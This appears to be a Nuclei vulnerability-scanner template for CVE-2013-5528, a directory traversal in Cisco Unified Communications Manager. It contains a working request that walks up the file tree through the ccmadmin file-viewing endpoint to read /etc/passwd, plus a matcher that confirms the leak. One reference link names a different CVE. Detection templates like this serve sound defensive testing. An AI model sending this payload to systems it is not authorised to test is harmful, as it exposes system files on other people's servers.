44 lines
1.6 KiB
YAML
44 lines
1.6 KiB
YAML
id: CVE-2013-5528
|
|
|
|
info:
|
|
name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
|
|
remediation: |
|
|
Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/40887
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-3120
|
|
- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N
|
|
cvss-score: 4
|
|
cve-id: CVE-2013-5528
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00565
|
|
epss-percentile: 0.75217
|
|
cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: cisco
|
|
product: unified_communications_manager
|
|
tags: cve,cve2013,lfi,cisco,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100ac1a449c81a019bac93f8960865ab43df014d4d3b9a7c4e6f41060b61679f1780221008fd6c12c8900c88542edd0c9483139aea53553898ce5b8ad3c28db940f4c83d1:922c64590222798bb761d5b6d8e72950
|